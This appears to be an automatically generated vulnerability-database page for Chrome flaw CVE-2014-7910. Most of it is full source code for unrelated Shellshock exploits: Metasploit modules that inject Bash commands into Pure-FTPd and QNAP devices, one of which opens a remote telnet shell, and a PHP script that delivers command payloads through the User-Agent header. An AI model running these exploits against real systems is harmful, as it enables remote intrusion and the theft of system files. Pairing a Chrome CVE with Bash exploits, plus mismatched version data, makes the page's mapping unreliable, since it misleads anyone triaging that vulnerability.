CVE-2014-7910

high
Published 2014-11-19 · Modified 2026-05-06
VIR risk
8.5

Description

Multiple unspecified vulnerabilities in Google Chrome before 39.0.2171.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-34879 remote linux
hobbily plunt · 2014-10-04

OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection

EDB-34839 webapps cgi verified
Claudio Viviani · 2014-10-01

IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection

EDB-34862 remote linux verified ruby · 4 KB
Metasploit · 2014-10-02

Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)

ruby exploit Source: Exploit-DB
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
      'Description'     => %q(
        This module exploits the code injection flaw known as shellshock which
        leverages specially crafted environment variables in Bash. This exploit
        specifically targets Pure-FTPd when configured to use an external
        program for authentication.
      ),
      'Author'          =>
        [
          'Stephane Chazelas', # Vulnerability discovery
          'Frank Denis', # Discovery of Pure-FTPd attack vector
          'Spencer McIntyre' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2014-6271'],
          ['OSVDB', '112004'],
          ['EDB', '34765'],
          ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
        ],
      'Payload'         =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'         =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => :printf
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => :printf
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependFork' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 24 2014'))
    register_options(
      [
        Opt::RPORT(21),
        OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
      ], self.class)
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def check
    # this check method tries to use the vulnerability to bypass the login
    username = rand_text_alphanumeric(rand(20) + 1)
    random_id = (rand(100) + 1)
    command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
    if send_command(username, command) =~ /^2\d\d ok./i
      return CheckCode::Safe if banner !~ /pure-ftpd/i
      disconnect

      command = "echo auth_ok:0; echo end"
      if send_command(username, command) =~ /^5\d\d login authentication failed/i
        return CheckCode::Vulnerable
      end
    end
    disconnect

    CheckCode::Safe
  end

  def execute_command(cmd, _opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
    username = rand_text_alphanumeric(rand(20) + 1)
    send_command(username, cmd)
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end

    execute_cmdstager(linemax: 500)
    handler
  end

  def send_command(username, cmd)
    cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
    connect
    send_user(username)
    password_result = send_pass(cmd)
    disconnect
    password_result
  end
end
EDB-36609 webapps multiple
Roberto Suggi Liverani · 2015-04-02

Kemp Load Master 7.1.16 - Multiple Vulnerabilities

EDB-35146 webapps php
Ryan King (Starfall) · 2014-11-03

PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection

EDB-34777 remote cgi verified
Shaun Colley · 2014-09-25

GNU Bash - Environment Variable Command Injection (Metasploit)

EDB-34895 webapps cgi verified
Fady Mohammed Osman · 2014-10-06

Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)

EDB-36503 remote hardware ruby · 4 KB
Patrick Pellegrino · 2015-03-26

QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)

ruby exploit Source: Exploit-DB
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##

require 'msf/core'
require 'net/telnet'

class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::CommandShell

   def initialize(info = {})
    super(update_info(info,
      'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
      'Description' => %q{
		This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
		Affected products:
		All Turbo NAS models except TS-100, TS-101, TS-200
		},
      'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
      'License' => MSF_LICENSE,
      'References' => [
			['CVE', '2014-6271'], #aka ShellShock
			['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
		],
      'Platform'       => ['unix']
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
      OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
    ], self.class)
  end

 def check
	begin
 	res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path),
        'agent' => "() { :;}; echo; /usr/bin/id"
      })
	rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
		vprint_error("Connection failed")
		return Exploit::CheckCode::Unknown
 end
	
    if !res
      return Exploit::CheckCode::Unknown
    elsif res.code== 302 and res.body.include? 'uid'
	  return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end
	

  def exploit_telnet()
    telnetport = datastore['LTELNET']

    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")

    print_status("#{rhost}:#{rport} - Sending exploit")
    begin
      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })

      if sock
        print_good("#{rhost}:#{rport} - Backdoor service spawned")
        add_socket(sock)
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
      end

      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
      merge_me = {
        'USERPASS_FILE' => nil,
        'USER_FILE'     => nil,
        'PASS_FILE'     => nil,
        'USERNAME'      => nil,
        'PASSWORD'      => nil
      }
      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
    rescue
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
    end
    return
  end

  def run
	begin
	telnetport = datastore['LTELNET']
	res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path),
        'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
      })		    
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
           Rex::HostUnreachable => e
      fail_with(Failure::Unreachable, e)
    ensure
      disconnect
    end
	exploit_telnet()
    
  end
	
end
EDB-36504 remote hardware ruby · 3 KB
Patrick Pellegrino · 2015-03-26

QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)

ruby exploit Source: Exploit-DB
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

   def initialize(info = {})
    super(update_info(info,
      'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
      'Description' => %q{
		This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
		Affected products:
		All Turbo NAS models except TS-100, TS-101, TS-200
		},
      'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
      'License' => MSF_LICENSE,
      'References' => [
			['CVE', '2014-6271'], #aka ShellShock
			['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
		],
      'Platform'       => ['unix']
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
      OptString.new('CMD', [ true, 'The command to run', '/bin/cat  /etc/passwd'])
    ], self.class)
  end

 def check
	begin
 	res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path),
        'agent' => "() { :;}; echo; /usr/bin/id"
      })
	rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
		vprint_error("Connection failed")
		return Exploit::CheckCode::Unknown
 end
	
    if !res
      return Exploit::CheckCode::Unknown
    elsif res.code== 302 and res.body.include? 'uid'
	  return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end
	

  def run

	res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path),
        'agent' => "() { :;}; echo; #{datastore['CMD']}"
      })
	
	if res.body.empty?
		print_error("No data found.")
	elsif res.code== 302
		print_status("#{rhost}:#{rport} - bash env variable injected")
		puts " "
		print_line(res.body)
    end
	end
	
end
EDB-34766 remote linux verified php · 2 KB
Prakhar Prasad & Subho Halder · 2014-09-25

Bash - 'Shellshock' Environment Variables Command Injection

php exploit Source: Exploit-DB
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
	   GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
	   Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code : #!/bin/bash
				echo "Content-type: text/html"
				echo ""
				echo "Bash-is-Vulnerable"

*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x  = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
	die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");

}
$url = $x['u'];
$cmd = $x['c'];

$context = stream_context_create(
	array(
		'http' => array(
			'method'  => 'GET',
			'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
		)
	)
);
$req = file_get_contents($url, false, $context);
if(!$req && strpos($http_response_header[0],"500") > 0 )
	die("Command sent to the server!\n");
else if($req && !strpos($http_response_header[0],"500") > 0)
	die("Server didn't respond as it should!\n");
else if(!$req && $http_response_header == NULL)
	die("A connection error occurred!\n")
?>
EDB-35115 remote linux verified
Metasploit · 2014-10-29

CUPS Filter - Bash Environment Variable Code Injection (Metasploit)

EDB-34765 remote linux verified
Stephane Chazelas · 2014-09-25

GNU Bash - 'Shellshock' Environment Variable Command Injection

EDB-34860 remote linux
@0x00string · 2014-10-02

GNU bash 4.3.11 - Environment Variable dhclient

EDB-34896 remote linux verified
Phil Blank · 2014-10-06

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection


Application impact

Vendor Product Versions Fixed
gcp googlechrome{"endIncluding":"39.0.2171.45"}
